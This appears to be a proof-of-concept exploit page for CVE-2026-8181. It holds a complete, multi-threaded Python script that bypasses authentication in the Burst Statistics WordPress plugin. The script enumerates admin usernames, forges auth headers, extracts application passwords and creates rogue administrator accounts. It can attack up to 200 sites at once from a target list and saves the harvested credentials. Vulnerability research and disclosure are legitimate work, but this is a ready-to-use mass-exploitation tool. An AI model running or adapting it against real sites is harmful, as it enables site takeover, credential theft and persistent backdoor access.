5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE-2026-8181.py PY
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
CVE-2026-8181 - Burst Statistics 3.4.0-3.4.1.1 Authentication Bypass to Admin Account Takeover

Vulnerability: Authentication Bypass in is_mainwp_authenticated() method
Affected: Burst Statistics WordPress Plugin versions 3.4.0 - 3.4.1.1
CVSS: 9.8 (Critical)
Type: Unauthenticated

Root Cause:
    In class-mainwp-proxy.php, the is_mainwp_authenticated() method calls
    wp_authenticate_application_password(null, $username, $password). On HTTP sites
    (where wp_is_application_passwords_available() returns false), this function
    returns null instead of WP_Error. The subsequent check `is_wp_error(null)`
    evaluates to false, causing the code to fall through and authenticate
    based solely on the username via get_user_by('login', $username), without
    validating the password.

    The has_admin_access() method in trait-admin-helper.php is called during
    plugins_loaded (class-burst.php line 118), which fires BEFORE REST API
    route processing. This means wp_set_current_user() grants admin privileges
    for the ENTIRE request, allowing access to any WordPress REST endpoint.

Attack Flow:
    1. Attacker sends request with X-BURSTMAINWP: 1 header and
       Authorization: Basic <base64(admin_username:anything)>
    2. During plugins_loaded, Burst's has_admin_access() is called
    3. is_mainwp_authenticated() bypasses auth (null != WP_Error)
    4. wp_set_current_user() switches to admin user
    5. Attacker has full WordPress admin privileges for the request
    6. Can create new admin users, modify settings, install plugins, etc.

Usage:
    python3 CVE-2026-8181.py -u <target_url> [-U <admin_username>] [-o results.txt]
    python3 CVE-2026-8181.py -f targets.txt [-j 10] [--output-dir ./out]
    python3 CVE-2026-8181.py -f targets.txt -o combined.txt
"""

import argparse
import base64
import json
import os
import random
import string
import sys
import threading
import urllib3
from concurrent.futures import ThreadPoolExecutor, as_completed
from urllib.parse import urlparse

_stdout_lock = threading.Lock()
_combined_results_lock = threading.Lock()


def _sync_print(*args, **kwargs):
    with _stdout_lock:
        print(*args, **kwargs)


urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

try:
    import requests
except ImportError:
    print("[!] requests library required: pip3 install requests")
    sys.exit(1)


def format_results_text(doc, target_base):
    """Plain-text block for one target (Username / Password / ...)."""
    target_base = target_base.rstrip("/")
    new_admin = doc.get("new_admin_user")
    login_addr = f"{target_base}/wp-admin/"
    if isinstance(new_admin, dict) and new_admin.get("username"):
        username = new_admin["username"]
        password = new_admin["password"]
        email = new_admin["email"]
        user_id = new_admin["id"]
    else:
        username = password = email = ""
        user_id = ""
        if doc.get("success"):
            username = doc.get("bypass_username") or ""
            bp = doc.get("bypass_payload")
            if isinstance(bp, dict):
                email = bp.get("email") or ""
                _id = bp.get("id")
                if _id is not None:
                    user_id = _id

    lines = [
        f"Username: {username}",
        f"Password: {password}",
        f"Email: {email}",
        f"User ID: {user_id}",
        f"Login Address: {login_addr}",
    ]
    if doc.get("failure_reason"):
        lines.append("")
        lines.append(f"Note: {doc['failure_reason']}")
    elif doc.get("create_user_requested") and not (
        isinstance(new_admin, dict) and new_admin.get("username")
    ):
        lines.append("")
        lines.append("Note: New admin account was not created.")

    return "\n".join(lines) + "\n"


BANNER = """
 +----------------------------------------------------------------+
 |  CVE-2026-8181 - Burst Statistics Auth Bypass PoC             |
 |  Affected: 3.4.0 - 3.4.1.1 | Severity: CRITICAL (9.8)        |
 |  Type: Unauthenticated Admin Account Takeover                 |
 +----------------------------------------------------------------+
"""


def print_creator_credit():
    """Console credit for this PoC build."""
    _sync_print("")
    _sync_print("  [+] Created: Mürrez ")
    _sync_print('  [~] Multi-Thread CVE-2026-8181 Exploit ')
    _sync_print("")


class BurstExploit:
    def __init__(
        self,
        target_url,
        admin_username="admin",
        verify_ssl=False,
        timeout=15,
        output_path=None,
        log_prefix="",
        combined_output_path=None,
        save_failed_to_disk=True,
    ):
        self.target = target_url.rstrip("/")
        self.admin_user = admin_username
        self.verify = verify_ssl
        self.timeout = timeout
        self.output_path = output_path
        self.log_prefix = log_prefix or ""
        self.combined_output_path = combined_output_path
        self.save_failed_to_disk = save_failed_to_disk
        self.session = requests.Session()
        self.session.verify = verify_ssl
        self.session.headers.update({
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
        })

    def log(self, level, msg):
        colors = {"info": "\033[94m", "ok": "\033[92m", "warn": "\033[93m", "fail": "\033[91m", "end": "\033[0m"}
        prefix = {"info": "[*]", "ok": "[+]", "warn": "[!]", "fail": "[-]"}
        line = f"{colors.get(level, '')}{prefix.get(level, '[?]')} {self.log_prefix}{msg}{colors['end']}"
        _sync_print(line)

    def write_results_file(self, doc):
        """Write plain-text summary to output_path and/or append to combined_output_path."""
        success = doc.get("success")
        text = format_results_text(doc, self.target)

        if self.output_path and (self.save_failed_to_disk or success):
            try:
                with open(self.output_path, "w", encoding="utf-8") as f:
                    f.write(text)
                self.log("ok", f"Results written to {self.output_path}")
            except OSError as e:
                self.log("fail", f"Could not write results file: {e}")

        if self.combined_output_path and success:
            try:
                block = f"===== {self.target} =====\n{text}\n"
                with _combined_results_lock:
                    with open(self.combined_output_path, "a", encoding="utf-8") as f:
                        f.write(block)
            except OSError as e:
                self.log("fail", f"Could not append combined results file: {e}")

    def get_rest_url(self, route):
        """Build REST API URL, trying both pretty permalinks and fallback."""
        return f"{self.target}/wp-json{route}"

    def get_rest_url_fallback(self, route):
        return f"{self.target}/?rest_route={route}"

    def rest_request(self, method, route, headers=None, data=None):
        """Make a REST API request, trying pretty permalinks first, then fallback."""
        urls = [self.get_rest_url(route), self.get_rest_url_fallback(route)]
        for url in urls:
            try:
                resp = self.session.request(
                    method, url, headers=headers, json=data,
                    timeout=self.timeout, allow_redirects=True
                )
                try:
                    resp.json()
                    return resp
                except (json.JSONDecodeError, ValueError):
                    if "rest_route" not in url:
                        continue
                    return resp
            except requests.RequestException:
                continue
        return None

    def build_bypass_headers(self, username=None):
        """Construct headers that trigger the authentication bypass."""
        user = username or self.admin_user
        fake_creds = base64.b64encode(f"{user}:bypass_CVE-2026-8181".encode()).decode()
        return {
            "X-BURSTMAINWP": "1",
            "Authorization": f"Basic {fake_creds}",
            "Content-Type": "application/json",
        }

    def check_wordpress(self):
        """Verify the target is running WordPress."""
        self.log("info", f"Checking if {self.target} is WordPress...")
        try:
            resp = self.session.get(self.target, timeout=self.timeout)
            indicators = ["wp-content", "wp-includes", "wordpress", "wp-json"]
            for ind in indicators:
                if ind in resp.text.lower():
                    self.log("ok", "WordPress detected")
                    return True
            resp2 = self.rest_request("GET", "/wp/v2/")
            if resp2 and resp2.status_code == 200:
                self.log("ok", "WordPress REST API accessible")
                return True
        except requests.RequestException:
            pass
        self.log("warn", "Could not confirm WordPress installation")
        return False

    def check_burst_statistics(self):
        """Check if Burst Statistics is installed and detect version."""
        self.log("info", "Checking for Burst Statistics plugin...")
        version = None

        try:
            resp = self.session.get(
                f"{self.target}/wp-content/plugins/burst-statistics/readme.txt",
                timeout=self.timeout
            )
            if resp.status_code == 200 and "burst" in resp.text.lower():
                for line in resp.text.split("\n"):
                    if "stable tag:" in line.lower():
                        version = line.split(":")[-1].strip()
                        break
        except requests.RequestException:
            pass

        if not version:
            try:
                resp = self.session.get(self.target, timeout=self.timeout)
                if "burst-statistics" in resp.text:
                    self.log("ok", "Burst Statistics detected (version unknown)")
                    return "unknown"
            except requests.RequestException:
                pass

        if version:
            self.log("ok", f"Burst Statistics version: {version}")
            vuln_versions = ["3.4.0", "3.4.1", "3.4.1.1"]
            if version in vuln_versions:
                self.log("ok", f"Version {version} is VULNERABLE!")
                return version
            else:
                self.log("warn", f"Version {version} may not be vulnerable (affected: 3.4.0-3.4.1.1)")
                return version
        else:
            self.log("warn", "Burst Statistics not detected")
            return None

    def enumerate_users(self):
        """Attempt to enumerate WordPress admin usernames."""
        self.log("info", "Enumerating admin usernames...")
        usernames = []

        resp = self.rest_request("GET", "/wp/v2/users")
        if resp and resp.status_code == 200:
            try:
                users = resp.json()
                if isinstance(users, list):
                    for u in users:
                        slug = u.get("slug", "")
                        if slug:
                            usernames.append(slug)
                            self.log("ok", f"Found user: {slug} (ID: {u.get('id')})")
            except (json.JSONDecodeError, ValueError):
                pass

        if not usernames:
            for i in range(1, 6):
                try:
                    resp = self.session.get(
                        f"{self.target}/?author={i}",
                        timeout=self.timeout,
                        allow_redirects=False
                    )
                    if resp.status_code in [301, 302]:
                        location = resp.headers.get("Location", "")
                        if "/author/" in location:
                            username = location.rstrip("/").split("/author/")[-1]
                            usernames.append(username)
                            self.log("ok", f"Found user via author enum: {username}")
                except requests.RequestException:
                    continue

        if not usernames:
            usernames = [self.admin_user]
            self.log("warn", f"Could not enumerate users, using default: {self.admin_user}")

        return usernames

    def test_auth_bypass(self, username):
        """Test if the authentication bypass works for a given username."""
        self.log("info", f"Testing auth bypass with username: {username}")
        headers = self.build_bypass_headers(username)

        resp = self.rest_request("GET", "/wp/v2/users/me?context=edit", headers=headers)
        if resp and resp.status_code == 200:
            try:
                data = resp.json()
                if "id" in data and data.get("id", 0) > 0:
                    self.log("ok", f"AUTH BYPASS SUCCESSFUL! Authenticated as: {data.get('name', username)} (ID: {data['id']})")
                    self.log("ok", f"Email: {data.get('email', 'N/A')}")
                    roles = data.get("roles", [])
                    self.log("ok", f"Roles: {', '.join(roles)}")
                    return data
            except (json.JSONDecodeError, ValueError):
                pass

        resp2 = self.rest_request("POST", "/burst/v1/mainwp-auth", headers=headers, data={})
        if resp2 and resp2.status_code == 200:
            try:
                data = resp2.json()
                if "token" in data:
                    self.log("ok", "AUTH BYPASS SUCCESSFUL via mainwp-auth endpoint!")
                    self.log("ok", f"Application Password Token obtained: {data['token'][:20]}...")
                    return {"token": data["token"], "bypass": True}
            except (json.JSONDecodeError, ValueError):
                pass

        if resp:
            self.log("fail", f"Auth bypass failed (HTTP {resp.status_code})")
            try:
                err = resp.json()
                self.log("fail", f"Error: {err.get('message', err.get('code', 'unknown'))}")
            except (json.JSONDecodeError, ValueError):
                pass
        else:
            self.log("fail", "No response from server")

        return None

    def create_admin_user(self, username):
        """Create a new WordPress administrator account via the bypass."""
        new_user = "burst_" + "".join(random.choices(string.ascii_lowercase, k=6))
        new_pass = "".join(random.choices(string.ascii_letters + string.digits + "!@#$%", k=16))
        new_email = f"{new_user}@protonmail.com"

        self.log("info", f"Creating new admin account: {new_user}")
        headers = self.build_bypass_headers(username)
        payload = {
            "username": new_user,
            "password": new_pass,
            "email": new_email,
            "roles": ["administrator"],
            "name": new_user,
        }

        resp = self.rest_request("POST", "/wp/v2/users", headers=headers, data=payload)
        if resp and resp.status_code in [200, 201]:
            try:
                data = resp.json()
                if "id" in data:
                    self.log("ok", "=" * 50)
                    self.log("ok", "NEW ADMIN ACCOUNT CREATED SUCCESSFULLY!")
                    self.log("ok", f"  Username: {new_user}")
                    self.log("ok", f"  Password: {new_pass}")
                    self.log("ok", f"  Email:    {new_email}")
                    self.log("ok", f"  User ID:  {data['id']}")
                    self.log("ok", f"  Login:    {self.target}/wp-admin/")
                    self.log("ok", "=" * 50)
                    return {"username": new_user, "password": new_pass, "email": new_email, "id": data["id"]}
            except (json.JSONDecodeError, ValueError):
                pass

        if resp:
            self.log("fail", f"Failed to create admin user (HTTP {resp.status_code})")
            try:
                err = resp.json()
                self.log("fail", f"Error: {err.get('message', 'unknown')}")
            except (json.JSONDecodeError, ValueError):
                if "Protected" in resp.text or "<html" in resp.text.lower():
                    self.log("fail", "WAF/proxy blocking REST API requests")
        else:
            self.log("fail", "No response from server")

        return None

    def get_app_password(self, username):
        """Obtain Application Password via mainwp-auth endpoint."""
        self.log("info", "Attempting to obtain Application Password via mainwp-auth...")
        headers = self.build_bypass_headers(username)
        resp = self.rest_request("POST", "/burst/v1/mainwp-auth", headers=headers, data={})

        if resp and resp.status_code == 200:
            try:
                data = resp.json()
                if "token" in data:
                    token = data["token"]
                    try:
                        decoded = base64.b64decode(token).decode()
                        cred_user, cred_pass = decoded.split(":", 1)
                        self.log("ok", "Application Password obtained!")
                        self.log("ok", f"  Username: {cred_user}")
                        self.log("ok", f"  App Password: {cred_pass}")
                        self.log("ok", f"  Base64 Token: {token}")
                        return {"username": cred_user, "app_password": cred_pass, "token": token}
                    except Exception:
                        self.log("ok", f"Token obtained (raw): {token[:40]}...")
                        return {"token": token}
            except (json.JSONDecodeError, ValueError):
                pass

        if resp:
            self.log("fail", f"mainwp-auth failed (HTTP {resp.status_code})")
        return None

    def verify_access(self, username):
        """Verify admin access by reading sensitive WordPress data."""
        self.log("info", "Verifying admin access level...")
        headers = self.build_bypass_headers(username)

        checks = [
            ("GET", "/wp/v2/settings", "WordPress settings"),
            ("GET", "/wp/v2/plugins", "Installed plugins"),
            ("GET", "/wp/v2/users?context=edit&roles=administrator", "Admin users"),
        ]

        results = {}
        for method, route, desc in checks:
            resp = self.rest_request(method, route, headers=headers)
            if resp and resp.status_code == 200:
                self.log("ok", f"Access confirmed: {desc}")
                try:
                    results[desc] = resp.json()
                except (json.JSONDecodeError, ValueError):
                    results[desc] = True
            else:
                self.log("warn", f"Could not access: {desc}")

        return results

    def run(self, create_user=False, show_banner=True):
        """Execute the full exploit chain."""
        if show_banner:
            _sync_print(BANNER)
            print_creator_credit()

        doc = {
            "cve": "CVE-2026-8181",
            "success": False,
            "target": self.target,
            "wordpress_detected": False,
            "burst_statistics_version": None,
            "create_user_requested": create_user,
            "enumerated_usernames": [],
            "bypass_username": None,
            "bypass_payload": None,
            "verification_routes_ok": [],
            "application_password": None,
            "new_admin_user": None,
            "failure_reason": None,
        }

        doc["wordpress_detected"] = self.check_wordpress()
        version = self.check_burst_statistics()
        doc["burst_statistics_version"] = version

        if version and version not in ["3.4.0", "3.4.1", "3.4.1.1", "unknown"]:
            self.log("warn", f"Target version {version} is outside the known vulnerable range")
            self.log("info", "Proceeding with exploit attempt anyway...")

        _sync_print()
        usernames = self.enumerate_users()
        doc["enumerated_usernames"] = usernames

        for username in usernames:
            _sync_print()
            result = self.test_auth_bypass(username)
            if result:
                doc["success"] = True
                doc["bypass_username"] = username
                doc["bypass_payload"] = result

                _sync_print()
                verify_data = self.verify_access(username)
                doc["verification_routes_ok"] = list(verify_data.keys()) if verify_data else []

                _sync_print()
                app_pw = self.get_app_password(username)
                doc["application_password"] = app_pw

                if create_user:
                    _sync_print()
                    new_admin = self.create_admin_user(username)
                    doc["new_admin_user"] = new_admin
                    self.write_results_file(doc)
                    if new_admin:
                        return new_admin

                self.write_results_file(doc)
                if app_pw:
                    return app_pw
                return result

        _sync_print()
        self.log("fail", "Exploit failed - target may not be vulnerable or is protected by WAF")
        self.log("info", "Possible reasons:")
        self.log("info", "  - Plugin version is not in 3.4.0-3.4.1.1 range")
        self.log("info", "  - Site uses HTTPS (wp_is_application_passwords_available() returns true)")
        self.log("info", "  - WAF/reverse proxy blocking REST API")
        self.log("info", "  - Admin username is incorrect")
        doc["failure_reason"] = (
            "Exploit failed - target may not be vulnerable or is protected by WAF"
        )
        self.write_results_file(doc)
        return None


def load_targets(path):
    """Load target URLs from a text file (one per line; # starts a comment)."""
    targets = []
    with open(path, encoding="utf-8", errors="replace") as f:
        for raw in f:
            line = raw.strip()
            if not line or line.startswith("#"):
                continue
            if not urlparse(line).scheme:
                line = "http://" + line
            targets.append(line.rstrip("/"))
    return targets


def target_output_basename(url):
    """Filesystem-safe basename derived from URL host (and port if present)."""
    p = urlparse(url)
    host = p.hostname or "unknown"
    if p.port:
        host = f"{host}_{p.port}"
    safe = "".join(c if (c.isalnum() or c in "-_.") else "_" for c in host)
    return safe or "target"


def scan_target_worker(url, args, output_dir, combined_output_path):
    """Run exploit for one URL (used by thread pool)."""
    out_path = None
    if output_dir:
        out_path = os.path.join(output_dir, f"{target_output_basename(url)}.txt")
    exploit = BurstExploit(
        target_url=url,
        admin_username=args.username,
        verify_ssl=not args.insecure,
        timeout=args.timeout,
        output_path=out_path,
        combined_output_path=combined_output_path,
        save_failed_to_disk=False,
        log_prefix=f"[{url}] ",
    )
    try:
        result = exploit.run(create_user=args.create_user, show_banner=False)
        return url, bool(result)
    except Exception as exc:
        _sync_print(f"[-] [{url}] Worker error: {exc}")
        return url, False


def run_multi_target(args):
    """Scan many URLs concurrently."""
    urls = load_targets(args.targets_file)
    if not urls:
        print("[!] No targets loaded from file", file=sys.stderr)
        sys.exit(1)

    threads = max(1, min(args.threads, 200))
    _sync_print(BANNER)
    print_creator_credit()
    _sync_print(f"[*] Multi-target mode: {len(urls)} URL(s), {threads} worker thread(s)")
    if args.output_dir:
        os.makedirs(args.output_dir, exist_ok=True)
        _sync_print(f"[*] Per-target results directory: {args.output_dir}")
    if args.output:
        try:
            with open(args.output, "w", encoding="utf-8") as f:
                f.write("# CVE-2026-8181 combined results (successful exploits only)\n\n")
        except OSError as exc:
            print(f"[!] Could not initialize combined output file: {exc}", file=sys.stderr)
            sys.exit(1)
        _sync_print(f"[*] Combined results file: {args.output}")

    _sync_print()

    successes = []
    failures = []

    with ThreadPoolExecutor(max_workers=threads) as pool:
        future_map = {
            pool.submit(scan_target_worker, u, args, args.output_dir, args.output): u
            for u in urls
        }
        for fut in as_completed(future_map):
            try:
                url, ok = fut.result()
                if ok:
                    successes.append(url)
                else:
                    failures.append(url)
            except Exception as exc:
                u = future_map[fut]
                failures.append(u)
                _sync_print(f"[-] [{u}] Future error: {exc}")

    _sync_print()
    _sync_print(f"[+] Completed: {len(successes)} succeeded, {len(failures)} failed")
    return len(successes) > 0


def main():
    parser = argparse.ArgumentParser(
        description="CVE-2026-8181 - Burst Statistics Authentication Bypass PoC",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
  %(prog)s -u http://target.com
  %(prog)s -u http://target.com -U admin --create-user -o result.txt
  %(prog)s -f targets.txt -j 20 --output-dir ./results -k
  %(prog)s -f targets.txt -j 50 -o all-results.txt --create-user -k
  %(prog)s -u https://target.com -U administrator -k
        """
    )
    tgt = parser.add_mutually_exclusive_group(required=True)
    tgt.add_argument("-u", "--url", help="Single target WordPress base URL")
    tgt.add_argument(
        "-f",
        "--targets-file",
        metavar="FILE",
        help="Multi-target: text file with one URL/host per line (# comments OK)",
    )
    parser.add_argument("-U", "--username", default="admin", help="Admin username (default: admin)")
    parser.add_argument("--create-user", action="store_true", help="Create a new admin account")
    parser.add_argument(
        "-o",
        "--output",
        metavar="FILE",
        help="Write plain-text results: with -u one file; with -f append all targets into one FILE",
    )
    parser.add_argument(
        "--output-dir",
        metavar="DIR",
        help="Multi-target (-f): one .txt per host (optional; not with -o)",
    )
    parser.add_argument(
        "-j",
        "--threads",
        type=int,
        default=10,
        metavar="N",
        help="Multi-target: concurrent workers (default: 10, max: 200)",
    )
    parser.add_argument("-k", "--insecure", action="store_true", help="Skip SSL verification")
    parser.add_argument("-t", "--timeout", type=int, default=15, help="Request timeout in seconds")

    args = parser.parse_args()

    if args.targets_file:
        if args.output and args.output_dir:
            parser.error("With -f, use either -o (single combined file) or --output-dir (per host), not both")
        ok = run_multi_target(args)
        sys.exit(0 if ok else 1)

    if args.output_dir:
        parser.error("--output-dir is only for multi-target mode (-f)")

    exploit = BurstExploit(
        target_url=args.url,
        admin_username=args.username,
        verify_ssl=not args.insecure,
        timeout=args.timeout,
        output_path=args.output,
    )

    result = exploit.run(create_user=args.create_user)
    sys.exit(0 if result else 1)


if __name__ == "__main__":
    main()